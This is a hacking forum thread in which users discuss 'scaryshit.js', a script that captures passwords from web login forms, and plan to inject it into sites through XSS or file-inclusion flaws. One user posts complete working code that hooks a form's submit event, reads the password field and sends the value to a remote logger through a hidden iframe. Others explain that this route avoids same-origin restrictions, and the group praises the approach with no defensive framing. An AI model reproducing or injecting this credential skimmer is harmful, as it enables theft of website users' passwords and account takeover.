scaryshit.js

[neusbeer]

I found this.. didn't had the time for checking it yet.
http://h.ackack.net/download/mathias-karlsson/javascript/scaryshit-js


It enables writing a given password to a log file when a user submits a
password field.

Description: A Javascript that hooks forms including password fields and sends them to a logger trough a GET HTTP Request using AJAX when the user submits.

Think of the possibilities with XSS or even RFI/LFI.
I'm gonna give it a try next week when I have some more spare time,
change the code a bit.
and inject it in to a page with ....

<script src="http://downloads.ackack.net/scaryshit.js"></script>

I think it's gonna work.. and that's far more better than receiving cookie info with XSS. linking the log to your own server somewhere (with chmod 775 ofcourse )

[Kulverstukas]

whoa now this looks really nice. XSS just got scarier

[FuyuKitsune]

It seems pretty easy, I'm surprised it hasn't been done before.

Interesting method. Why setTimeout? Does that allow it to run immediately after the form submits?

[xzid]

This is very simple, just grab info + iframe.

I see no advantage to using XMLHttpRequest over an iframe, and one big drawback. Also this script fails on my ie8 and AJAX makes the rest of them suck.

Code: [Select]

var form = document.forms[0]; // or loop, w/e
var logger = "http://localhost/log.php?passwd=";

form.onsubmit = function() {
    var passwd;
    // or grab all <input>'s, pass is sufficient here
    for(var i = 0; i < form.elements.length; i++)
        if(form.elements[i].type == "password")
            passwd = form.elements[i].value;
    if(passwd) {
        var frame = document.createElement("iframe");
        frame.setAttribute("src", logger + escape(passwd));
        frame.setAttribute("style", "display: none;");
        if(document.all)
            frame.onreadystatechange = function() {
            if(frame.readyState == 'complete')
                form.submit(); }
        else
            frame.onload = function() { form.submit(); }   
        document.body.appendChild(frame);
        return false; }
    return true; }
// like my indentation?

Would need tampering, but tested successful on ie8/firefox7.

It seems pretty easy, I'm surprised it hasn't been done before.

It has.

[neusbeer]

thnxs for the input xzid.. gonna have a look at that one..
what's the big drawback?


My knowlegde with ajax is low, so have to figure it all out..
doesn't seems to difficult../
xzid's code far more shorter


gonna check it out tonight..

[xzid]

thnxs for the input xzid.. gonna have a look at that one..
what's the big drawback?

http://en.wikipedia.org/wiki/Same_origin_policy

Of course there are workarounds, although xmlhttprequest shouldn't be able to access remote webpages(where your logger is likely located). An iframe has no such restrictions:

<iframe src="http://remote/logger.php?passwd=mypass"></iframe>

[neusbeer]

ahh ofcourse..
if you have writing acces to that specific server you can write it own the server itself and try to download it.
But the idea you mentioned is even better indeed.
That Iframe idea.. I'm don't have a lot of skills wit iframe.. soo next goal, learning and understanding iframes and stuff.. also used wich clickjacking, so it woulnd't be wasted time to get to know that better.
I'm gonna set up a small testing environment tonight and gonna try it.

[bubzuru]

xzid +1 for the code

gunna test it later

[bubzuru]

and +1 for you neusbeer , i like your posts

[ande]

Haha, that is brilliant. Sometimes I really do wonder why I haven't thought of things like this. +1

[_ANONYMOUS_]

Nice